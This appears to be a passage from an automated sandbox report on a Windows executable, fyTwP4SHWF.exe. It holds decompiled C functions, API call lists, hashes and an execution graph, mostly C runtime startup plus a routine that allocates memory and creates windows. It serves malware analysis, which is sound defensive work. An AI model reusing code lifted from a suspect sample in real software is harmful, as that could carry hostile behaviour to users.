                      				E00404610(0x413);
                      				return 0;
                      			}





                      0x00405642
                      0x0040564c
                      0x00405668
                      0x0040568a
                      0x0040568d
                      0x00405693
                      0x0040569d
                      0x0040569e
                      0x004056a0
                      0x004056a6
                      0x004056a6
                      0x004056b0
                      0x00000000
                      0x004056be
                      0x00405675
                      0x004056ad
                      0x004056ad
                      0x00000000
                      0x004056ad
                      0x00405681
                      0x00405683
                      0x00000000
                      0x00405683
                      0x00405652
                      0x00000000
                      0x00000000
                      0x00405659
                      0x00000000

                      APIs
                      • IsWindowVisible.USER32 ref: 0040566D
                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                        • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Window$CallMessageProcSendVisible
                      • String ID:
                      • API String ID: 3748168415-3916222277
                      • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                      • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                      • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                      • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00405F83(WCHAR* _a4) {
                      				WCHAR* _t5;
                      				WCHAR* _t7;
                      
                      				_t7 = _a4;
                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                      				while( *_t5 != 0x5c) {
                      					_push(_t5);
                      					_push(_t7);
                      					_t5 = CharPrevW();
                      					if(_t5 > _t7) {
                      						continue;
                      					}
                      					break;
                      				}
                      				 *_t5 =  *_t5 & 0x00000000;
                      				return  &(_t5[1]);
                      			}





                      0x00405f84
                      0x00405f8e
                      0x00405f91
                      0x00405f97
                      0x00405f98
                      0x00405f99
                      0x00405fa1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405fa1
                      0x00405fa3
                      0x00405fab

                      APIs
                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fyTwP4SHWF.exe,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 00405F89
                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fyTwP4SHWF.exe,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 00405F99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CharPrevlstrlen
                      • String ID: C:\Users\user\Desktop
                      • API String ID: 2709904686-3976562730
                      • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                      • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                      • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                      • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                      				int _v8;
                      				int _t12;
                      				int _t14;
                      				int _t15;
                      				CHAR* _t17;
                      				CHAR* _t27;
                      
                      				_t12 = lstrlenA(_a8);
                      				_t27 = _a4;
                      				_v8 = _t12;
                      				while(lstrlenA(_t27) >= _v8) {
                      					_t14 = _v8;
                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                      					_t15 = lstrcmpiA(_t27, _a8);
                      					_t27[_v8] =  *(_t14 + _t27);
                      					if(_t15 == 0) {
                      						_t17 = _t27;
                      					} else {
                      						_t27 = CharNextA(_t27);
                      						continue;
                      					}
                      					L5:
                      					return _t17;
                      				}
                      				_t17 = 0;
                      				goto L5;
                      			}









                      0x004060cd
                      0x004060cf
                      0x004060d2
                      0x004060fe
                      0x004060d7
                      0x004060e0
                      0x004060e5
                      0x004060f0
                      0x004060f3
                      0x0040610f
                      0x004060f5
                      0x004060fc
                      0x00000000
                      0x004060fc
                      0x00406108
                      0x0040610c
                      0x0040610c
                      0x00406106
                      0x00000000

                      APIs
                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                      • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                      • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                      • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: lstrlen$CharNextlstrcmpi
                      • String ID:
                      • API String ID: 190613189-0
                      • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                      • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                      • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                      • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:16.6%
                      Dynamic/Decrypted Code Coverage:8.3%
                      Signature Coverage:6.7%
                      Total number of Nodes:1565
                      Total number of Limit Nodes:27
                      execution_graph 8821 4072c3 8822 4072cf __mtinitlocknum 8821->8822 8823 4072e7 8822->8823 8824 4073d1 __mtinitlocknum 8822->8824 8825 408bc0 _free 66 API calls 8822->8825 8826 4072f5 8823->8826 8828 408bc0 _free 66 API calls 8823->8828 8825->8823 8827 407303 8826->8827 8829 408bc0 _free 66 API calls 8826->8829 8830 407311 8827->8830 8831 408bc0 _free 66 API calls 8827->8831 8828->8826 8829->8827 8832 408bc0 _free 66 API calls 8830->8832 8834 40731f 8830->8834 8831->8830 8832->8834 8833 40733b 8837 40734c 8833->8837 8839 408bc0 _free 66 API calls 8833->8839 8835 408bc0 _free 66 API calls 8834->8835 8838 40732d 8834->8838 8835->8838 8836 408bc0 _free 66 API calls 8836->8833 8840 40a357 __lock 66 API calls 8837->8840 8838->8833 8838->8836 8839->8837 8841 407354 8840->8841 8842 407360 InterlockedDecrement 8841->8842 8843 407379 8841->8843 8842->8843 8845 40736b 8842->8845 8857 4073dd 8843->8857 8845->8843 8848 408bc0 _free 66 API calls 8845->8848 8847 40a357 __lock 66 API calls 8849 40738d 8847->8849 8848->8843 8850 4073be 8849->8850 8851 40878f ___removelocaleref 8 API calls 8849->8851 8860 4073e9 8850->8860 8855 4073a2 8851->8855 8854 408bc0 _free 66 API calls 8854->8824 8855->8850 8856 408828 ___freetlocinfo 66 API calls 8855->8856 8856->8850 8863 40a27e LeaveCriticalSection 8857->8863 8859 407386 8859->8847 8864 40a27e LeaveCriticalSection 8860->8864 8862 4073cb 8862->8854 8863->8859 8864->8862 9371 40588f 9378 406097 9371->9378 9374 4058a2 9376 408bc0 _free 66 API calls 9374->9376 9377 4058ad 9376->9377 9391 405fbd 9378->9391 9380 405894 9380->9374 9381 40a141 9380->9381 9382 40a14d __mtinitlocknum 9381->9382 9383 40a357 __lock 66 API calls 9382->9383 9386 40a159 9383->9386 9384 40a1bf 9421 40a1d4 9384->9421 9386->9384 9389 40a194 DeleteCriticalSection 9386->9389 9408 40e7bf 9386->9408 9387 40a1cb __mtinitlocknum 9387->9374 9390 408bc0 _free 66 API calls 9389->9390 9390->9386 9392 405fc9 __mtinitlocknum 9391->9392 9393 40a357 __lock 66 API calls 9392->9393 9394 405fd8 9393->9394 9395 406070 9394->9395 9397 4058f0 _flsall 67 API calls 9394->9397 9400 405f75 101 API calls __fflush_nolock 9394->9400 9401 40605f 9394->9401 9404 40608e 9395->9404 9397->9394 9398 40607c __mtinitlocknum 9398->9380 9400->9394 9402 40595e __wfsopen 2 API calls 9401->9402 9403 40606d 9402->9403 9403->9394 9407 40a27e LeaveCriticalSection 9404->9407 9406 406095 9406->9398 9407->9406 9409 40e7cb __mtinitlocknum 9408->9409 9410 40e7f2 9409->9410 9411 40e7dd 9409->9411 9413 4058af __lock_file 67 API calls 9410->9413 9419 40e7ed __mtinitlocknum 9410->9419 9412 40370a __mtinitlocknum 66 API calls 9411->9412 9414 40e7e2 9412->9414 9415 40e80b 9413->9415 9416 4036b8 ___strgtold12_l 11 API calls 9414->9416 9424 40e752 9415->9424 9416->9419 9419->9386 9474 40a27e LeaveCriticalSection 9421->9474 9423 40a1db 9423->9387 9425 40e763 9424->9425 9426 40e777 9424->9426 9427 40370a __mtinitlocknum 66 API calls 9425->9427 9428 405f0d __flush 97 API calls 9426->9428 9433 40e773 9426->9433 9429 40e768 9427->9429 9430 40e783 9428->9430 9431 4036b8 ___strgtold12_l 11 API calls 9429->9431 9443 40f116 9430->9443 9431->9433 9440 40e82b 9433->9440 9435 40573d __filbuf 66 API calls 9436 40e791 9435->9436 9447 40ea85 9436->9447 9438 40e797 9438->9433 9439 408bc0 _free 66 API calls 9438->9439 9439->9433 9441 405922 __wfsopen 2 API calls 9440->9441 9442 40e831 9441->9442 9442->9419 9444 40e78b 9443->9444 9445 40f126 9443->9445 9444->9435 9445->9444 9446 408bc0 _free 66 API calls 9445->9446 9446->9444 9448 40ea91 __mtinitlocknum 9447->9448 9449 40ea99 9448->9449 9452 40eab4 9448->9452 9450 40371d __write 66 API calls 9449->9450 9453 40ea9e 9450->9453 9451 40eac0 9454 40371d __write 66 API calls 9451->9454 9452->9451 9455 40eafa 9452->9455 9456 40370a __mtinitlocknum 66 API calls 9453->9456 9457 40eac5 9454->9457 9459 409b77 ___lock_fhandle 68 API calls 9455->9459 9465 40eaa6 __mtinitlocknum 9456->9465 9458 40370a __mtinitlocknum 66 API calls 9457->9458 9460 40eacd 9458->9460 9461 40eb00 9459->9461 9462 4036b8 ___strgtold12_l 11 API calls 9460->9462 9463 40eb1a 9461->9463 9464 40eb0e 9461->9464 9462->9465 9467 40370a __mtinitlocknum 66 API calls 9463->9467 9466 40e9e9 __close_nolock 69 API calls 9464->9466 9465->9438 9468 40eb14 9466->9468 9467->9468 9470 40eb41 9468->9470 9473 409c16 LeaveCriticalSection 9470->9473 9472 40eb47 9472->9465 9473->9472 9474->9423 7164 403253 7202 405990 7164->7202 7166 40325f GetStartupInfoW 7167 403273 HeapSetInformation 7166->7167 7169 40327e 7166->7169 7167->7169 7203 40756d HeapCreate 7169->7203 7170 4032cc 7171 4032d7 7170->7171 7308 40322a 7170->7308 7204 4073f2 GetModuleHandleW 7171->7204 7174 4032dd 7175 4032e8 __RTC_Initialize 7174->7175 7176 40322a _fast_error_exit 66 API calls 7174->7176 7229 405b7f GetStartupInfoW 7175->7229 7176->7175 7179 403302 GetCommandLineW 7242 407055 GetEnvironmentStringsW 7179->7242 7183 403312 7248 406fa7 GetModuleFileNameW 7183->7248 7185 40331c 7186 403327 7185->7186 7187 4069b9 __amsg_exit 66 API calls 7185->7187 7252 406d75 7186->7252 7187->7186 7189 40332d 7190 403338 7189->7190 7191 4069b9 __amsg_exit 66 API calls 7189->7191 7266 406798 7190->7266 7191->7190 7193 403340 7194 4069b9 __amsg_exit 66 API calls 7193->7194 7195 40334b __wwincmdln 7193->7195 7194->7195 7272 402571 6 API calls 7195->7272 7198 40337b 7326 40699b 7198->7326 7201 403380 __mtinitlocknum 7202->7166 7203->7170 7205 407406 7204->7205 7206 40740f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7204->7206 7329 40713f 7205->7329 7208 407459 TlsAlloc 7206->7208 7211 4074a7 TlsSetValue 7208->7211 7212 407568 7208->7212 7211->7212 7213 4074b8 7211->7213 7212->7174 7339 406741 7213->7339 7218 407500 DecodePointer 7221 407515 7218->7221 7219 407563 7220 40713f __mtterm 70 API calls 7219->7220 7220->7212 7221->7219 7348 408c3f 7221->7348 7224 407533 DecodePointer 7225 407544 7224->7225 7225->7219 7226 407548 7225->7226 7354 40717c 7226->7354 7228 407550 GetCurrentThreadId 7228->7212 7230 408c3f __calloc_crt 66 API calls 7229->7230 7241 405b9d 7230->7241 7231 405d12 7232 405d48 GetStdHandle 7231->7232 7234 405dac SetHandleCount 7231->7234 7235 405d5a GetFileType 7231->7235 7240 405d80 InitializeCriticalSectionAndSpinCount 7231->7240 7232->7231 7233 408c3f __calloc_crt 66 API calls 7233->7241 7236 4032f6 7234->7236 7235->7231 7236->7179 7316 4069b9 7236->7316 7237 405c92 7237->7231 7238 405cc9 InitializeCriticalSectionAndSpinCount 7237->7238 7239 405cbe GetFileType 7237->7239 7238->7236 7238->7237 7239->7237 7239->7238 7240->7231 7240->7236 7241->7231 7241->7233 7241->7236 7241->7237 7241->7241 7243 407066 7242->7243 7244 40706a 7242->7244 7243->7183 7245 408bfa __malloc_crt 66 API calls 7244->7245 7246 40708c _memmove 7245->7246 7247 407093 FreeEnvironmentStringsW 7246->7247 7247->7183 7249 406fdc _wparse_cmdline 7248->7249 7250 408bfa __malloc_crt 66 API calls 7249->7250 7251 40701f _wparse_cmdline 7249->7251 7250->7251 7251->7185 7253 406d8d _wcslen 7252->7253 7257 406d85 7252->7257 7254 408c3f __calloc_crt 66 API calls 7253->7254 7259 406db1 _wcslen 7254->7259 7255 406e07 7256 408bc0 _free 66 API calls 7255->7256 7256->7257 7257->7189 7258 408c3f __calloc_crt 66 API calls 7258->7259 7259->7255 7259->7257 7259->7258 7260 406e2d 7259->7260 7262 40b76e __NMSG_WRITE 66 API calls 7259->7262 7263 406e44 7259->7263 7261 408bc0 _free 66 API calls 7260->7261 7261->7257 7262->7259 7264 403666 __invoke_watson 10 API calls 7263->7264 7265 406e50 7264->7265 7265->7189 7268 4067a6 __IsNonwritableInCurrentImage 7266->7268 7598 404f13 7268->7598 7269 4067c4 __initterm_e 7271 4067e5 __IsNonwritableInCurrentImage 7269->7271 7601 40b48e 7269->7601 7271->7193 7273 4025bb Sleep 7272->7273 7274 4025c8 7273->7274 7275 402643 RegisterWindowMessageW 7274->7275 7666 40318f 7274->7666 7276 402664 _memset 7275->7276 7716 4014ec GetSystemMetrics GetSystemMetrics 7276->7716 7281 402674 _memset 7284 402682 6 API calls 7281->7284 7282 4025eb 7682 402f66 7282->7682 7286 402708 MonitorFromRect GetMonitorInfoW 7284->7286 7302 402701 7284->7302 7285 4025f1 7287 403055 _fseek 101 API calls 7285->7287 7293 402748 CreateWindowExW 7286->7293 7288 4025fb VirtualAlloc 7287->7288 7695 402db5 7288->7695 7291 4027a2 7778 401abc 13 API calls 7291->7778 7292 402795 ExitProcess 7293->7291 7293->7292 7297 4027a7 ShowWindow UpdateWindow DragAcceptFiles GetCommandLineW 7779 401f93 7297->7779 7301 402835 GetMessageW 7301->7302 7303 4027f8 IsDialogMessageW 7301->7303 7302->7198 7323 40696f 7302->7323 7303->7301 7304 40280c TranslateAcceleratorW 7303->7304 7304->7301 7305 402821 TranslateMessage DispatchMessageW 7304->7305 7305->7301 7309 403238 7308->7309 7310 40323d 7308->7310 7311 406bac __FF_MSGBANNER 66 API calls 7309->7311 7312 4069fd __NMSG_WRITE 66 API calls 7310->7312 7311->7310 7313 403245 7312->7313 7314 406717 __mtinitlocknum 3 API calls 7313->7314 7315 40324f 7314->7315 7315->7171 7317 406bac __FF_MSGBANNER 66 API calls 7316->7317 7318 4069c3 7317->7318 7319 4069fd __NMSG_WRITE 66 API calls 7318->7319 7320 4069cb 7319->7320 8780 406985 7320->8780 7324 40682f _doexit 66 API calls 7323->7324 7325 406980 7324->7325 7325->7198 7327 40682f _doexit 66 API calls 7326->7327 7328 4069a6 7327->7328 7328->7201 7330 407149 DecodePointer 7329->7330 7331 407158 7329->7331 7330->7331 7332 407177 7331->7332 7333 407169 TlsFree 7331->7333 7334 40a243 DeleteCriticalSection 7332->7334 7335 40a25b 7332->7335 7333->7332 7367 408bc0 7334->7367 7337 40a26d DeleteCriticalSection 7335->7337 7338 40740b 7335->7338 7337->7335 7338->7174 7393 4070f9 RtlEncodePointer 7339->7393 7341 406749 __init_pointers __initp_misc_winsig 7394 40b100 EncodePointer 7341->7394 7343 40676f EncodePointer EncodePointer EncodePointer EncodePointer 7344 40a1dd 7343->7344 7345 40a1e8 7344->7345 7346 40a1f2 InitializeCriticalSectionAndSpinCount 7345->7346 7347 4074fc 7345->7347 7346->7345 7346->7347 7347->7218 7347->7219 7349 408c48 7348->7349 7351 40752b 7349->7351 7352 408c66 Sleep 7349->7352 7395 40c55d 7349->7395 7351->7219 7351->7224 7353 408c7b 7352->7353 7353->7349 7353->7351 7406 405990 7354->7406 7356 407188 GetModuleHandleW 7407 40a357 7356->7407 7358 4071c6 InterlockedIncrement 7414 40721e 7358->7414 7361 40a357 __lock 64 API calls 7362 4071e7 7361->7362 7417 408700 InterlockedIncrement 7362->7417 7364 407205 7429 407227 7364->7429 7366 407212 __mtinitlocknum 7366->7228 7368 408bcb HeapFree 7367->7368 7372 408bf4 _free 7367->7372 7369 408be0 7368->7369 7368->7372 7373 40370a 7369->7373 7372->7332 7376 407230 GetLastError 7373->7376 7375 40370f GetLastError 7375->7372 7390 40710b TlsGetValue 7376->7390 7379 40729d SetLastError 7379->7375 7380 408c3f __calloc_crt 62 API calls 7381 40725b 7380->7381 7381->7379 7382 407263 DecodePointer 7381->7382 7383 407278 7382->7383 7384 407294 7383->7384 7385 40727c 7383->7385 7387 408bc0 _free 62 API calls 7384->7387 7386 40717c __getptd_noexit 62 API calls 7385->7386 7388 407284 GetCurrentThreadId 7386->7388 7389 40729a 7387->7389 7388->7379 7389->7379 7391 407120 DecodePointer TlsSetValue 7390->7391 7392 40713b 7390->7392 7391->7392 7392->7379 7392->7380 7393->7341 7394->7343 7396 40c569 7395->7396 7402 40c584 7395->7402 7397 40c575 7396->7397 7396->7402 7398 40370a __mtinitlocknum 65 API calls 7397->7398 7400 40c57a 7398->7400 7399 40c597 RtlAllocateHeap 7401 40c5be 7399->7401 7399->7402 7400->7349 7401->7349 7402->7399 7402->7401 7404 40b343 DecodePointer 7402->7404 7405 40b358 7404->7405 7405->7402 7406->7356 7408 40a36c 7407->7408 7409 40a37f EnterCriticalSection 7407->7409 7432 40a295 7408->7432 7409->7358 7411 40a372 7411->7409 7412 4069b9 __amsg_exit 65 API calls 7411->7412 7413 40a37e 7412->7413 7413->7409 7596 40a27e LeaveCriticalSection 7414->7596 7416 4071e0 7416->7361 7418 408721 7417->7418 7419 40871e InterlockedIncrement 7417->7419 7420 40872b InterlockedIncrement 7418->7420 7421 40872e 7418->7421 7419->7418 7420->7421 7422 408738 InterlockedIncrement 7421->7422 7423 40873b 7421->7423 7422->7423 7424 408745 InterlockedIncrement 7423->7424 7425 408748 7423->7425 7424->7425 7426 408761 InterlockedIncrement 7425->7426 7427 408771 InterlockedIncrement 7425->7427 7428 40877c InterlockedIncrement 7425->7428 7426->7425 7427->7425 7428->7364 7597 40a27e LeaveCriticalSection 7429->7597 7431 40722e 7431->7366 7433 40a2a1 __mtinitlocknum 7432->7433 7434 40a2b1 7433->7434 7435 40a2c9 7433->7435 7459 406bac 7434->7459 7443 40a2d7 __mtinitlocknum 7435->7443 7495 408bfa 7435->7495 7441 40a2f8 7446 40a357 __lock 65 API calls 7441->7446 7442 40a2e9 7445 40370a __mtinitlocknum 65 API calls 7442->7445 7443->7411 7445->7443 7448 40a2ff 7446->7448 7450 40a332 7448->7450 7451 40a307 InitializeCriticalSectionAndSpinCount 7448->7451 7452 408bc0 _free 65 API calls 7450->7452 7453 40a317 7451->7453 7454 40a323 7451->7454 7452->7454 7455 408bc0 _free 65 API calls 7453->7455 7501 40a34e 7454->7501 7457 40a31d 7455->7457 7458 40370a __mtinitlocknum 65 API calls 7457->7458 7458->7454 7504 40b7d1 7459->7504 7461 406bb3 7462 40b7d1 __NMSG_WRITE 66 API calls 7461->7462 7464 406bc0 7461->7464 7462->7464 7463 4069fd __NMSG_WRITE 66 API calls 7465 406bd8 7463->7465 7464->7463 7466 406be2 7464->7466 7467 4069fd __NMSG_WRITE 66 API calls 7465->7467 7468 4069fd 7466->7468 7467->7466 7469 406a1e __NMSG_WRITE 7468->7469 7470 40b7d1 __NMSG_WRITE 63 API calls 7469->7470 7491 406b3a 7469->7491 7472 406a38 7470->7472 7474 406b49 GetStdHandle 7472->7474 7475 40b7d1 __NMSG_WRITE 63 API calls 7472->7475 7473 406baa 7492 406717 7473->7492 7479 406b57 _strlen 7474->7479 7474->7491 7477 406a49 7475->7477 7476 406a5b 7476->7491 7529 40b76e 7476->7529 7477->7474 7477->7476 7481 406b8d WriteFile 7479->7481 7479->7491 7481->7491 7482 406a87 GetModuleFileNameW 7483 406aa8 7482->7483 7488 406ab4 _wcslen 7482->7488 7485 40b76e __NMSG_WRITE 63 API calls 7483->7485 7484 403666 __invoke_watson 10 API calls 7484->7488 7485->7488 7486 40b611 63 API calls __NMSG_WRITE 7486->7488 7488->7484 7488->7486 7489 406b2a 7488->7489 7538 40b686 7488->7538 7547 40b4a5 7489->7547 7565 40800d 7491->7565 7575 4066ec GetModuleHandleW 7492->7575 7497 408c03 7495->7497 7498 408c39 7497->7498 7499 408c1a Sleep 7497->7499 7578 40c4c9 7497->7578 7498->7441 7498->7442 7500 408c2f 7499->7500 7500->7497 7500->7498 7595 40a27e LeaveCriticalSection 7501->7595 7503 40a355 7503->7443 7505 40b7dd 7504->7505 7506 40b7e7 7505->7506 7507 40370a __mtinitlocknum 66 API calls 7505->7507 7506->7461 7508 40b800 7507->7508 7511 4036b8 7508->7511 7514 40368b DecodePointer 7511->7514 7515 4036a0 7514->7515 7520 403666 7515->7520 7517 4036b7 7518 40368b ___strgtold12_l 10 API calls 7517->7518 7519 4036c4 7518->7519 7519->7461 7523 40353d 7520->7523 7524 40355c _memset __call_reportfault 7523->7524 7525 40357a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7524->7525 7527 403648 __call_reportfault 7525->7527 7526 40800d __ld12tod 5 API calls 7528 403664 GetCurrentProcess TerminateProcess 7526->7528 7527->7526 7528->7517 7530 40b783 7529->7530 7531 40b77c 7529->7531 7532 40370a __mtinitlocknum 66 API calls 7530->7532 7531->7530 7535 40b7a4 7531->7535 7533 40b788 7532->7533 7534 4036b8 ___strgtold12_l 11 API calls 7533->7534 7536 406a7c 7534->7536 7535->7536 7537 40370a __mtinitlocknum 66 API calls 7535->7537 7536->7482 7536->7488 7537->7533 7542 40b698 7538->7542 7539 40b69c 7540 40b6a1 7539->7540 7541 40370a __mtinitlocknum 66 API calls 7539->7541 7540->7488 7543 40b6b8 7541->7543 7542->7539 7542->7540 7545 40b6df 7542->7545 7544 4036b8 ___strgtold12_l 11 API calls 7543->7544 7544->7540 7545->7540 7546 40370a __mtinitlocknum 66 API calls 7545->7546 7546->7543 7573 4070f9 RtlEncodePointer 7547->7573 7549 40b4cb 7550 40b558 7549->7550 7551 40b4db LoadLibraryW 7549->7551 7557 40b572 DecodePointer DecodePointer 7550->7557 7562 40b585 7550->7562 7552 40b5f0 7551->7552 7553 40b4f0 GetProcAddress 7551->7553 7558 40800d __ld12tod 5 API calls 7552->7558 7553->7552 7556 40b506 7 API calls 7553->7556 7554 40b5e4 DecodePointer 7554->7552 7555 40b5bb DecodePointer 7555->7554 7559 40b5c2 7555->7559 7556->7550 7560 40b548 GetProcAddress EncodePointer 7556->7560 7557->7562 7561 40b60f 7558->7561 7559->7554 7563 40b5d5 DecodePointer 7559->7563 7560->7550 7561->7491 7562->7554 7562->7555 7564 40b5a8 7562->7564 7563->7554 7563->7564 7564->7554 7566 408015 7565->7566 7567 408017 IsDebuggerPresent 7565->7567 7566->7473 7574 408005 7567->7574 7570 40b958 SetUnhandledExceptionFilter UnhandledExceptionFilter 7571 40b975 __call_reportfault 7570->7571 7572 40b97d GetCurrentProcess TerminateProcess 7570->7572 7571->7572 7572->7473 7573->7549 7574->7570 7576 406700 GetProcAddress 7575->7576 7577 406710 ExitProcess 7575->7577 7576->7577 7579 40c546 7578->7579 7584 40c4d7 7578->7584 7580 40b343 _malloc DecodePointer 7579->7580 7582 40c54c 7580->7582 7581 40c4e2 7583 406bac __FF_MSGBANNER 65 API calls 7581->7583 7581->7584 7588 4069fd __NMSG_WRITE 65 API calls 7581->7588 7591 406717 __mtinitlocknum 3 API calls 7581->7591 7585 40370a __mtinitlocknum 65 API calls 7582->7585 7583->7581 7584->7581 7586 40c505 RtlAllocateHeap 7584->7586 7589 40c532 7584->7589 7592 40b343 _malloc DecodePointer 7584->7592 7593 40c530 7584->7593 7587 40c53e 7585->7587 7586->7584 7586->7587 7587->7497 7588->7581 7590 40370a __mtinitlocknum 65 API calls 7589->7590 7590->7593 7591->7581 7592->7584 7594 40370a __mtinitlocknum 65 API calls 7593->7594 7594->7587 7595->7503 7596->7416 7597->7431 7599 404f19 EncodePointer 7598->7599 7599->7599 7600 404f33 7599->7600 7600->7269 7604 40b452 7601->7604 7603 40b49b 7603->7271 7605 40b45e __mtinitlocknum 7604->7605 7612 40672f 7605->7612 7611 40b47f __mtinitlocknum 7611->7603 7613 40a357 __lock 66 API calls 7612->7613 7614 406736 7613->7614 7615 40b36b DecodePointer DecodePointer 7614->7615 7616 40b399 7615->7616 7617 40b41a 7615->7617 7616->7617 7629 40ed04 7616->7629 7626 40b488 7617->7626 7619 40b3fd EncodePointer EncodePointer 7619->7617 7620 40b3cf 7620->7617 7623 408c8b __realloc_crt 70 API calls 7620->7623 7625 40b3eb EncodePointer 7620->7625 7621 40b3ab 7621->7619 7621->7620 7636 408c8b 7621->7636 7624 40b3e5 7623->7624 7624->7617 7624->7625 7625->7619 7662 406738 7626->7662 7630 40ed24 HeapSize 7629->7630 7631 40ed0f 7629->7631 7630->7621 7632 40370a __mtinitlocknum 66 API calls 7631->7632 7633 40ed14 7632->7633 7634 4036b8 ___strgtold12_l 11 API calls 7633->7634 7635 40ed1f 7634->7635 7635->7621 7638 408c94 7636->7638 7639 408cd3 7638->7639 7640 408cb4 Sleep 7638->7640 7641 40c5df 7638->7641 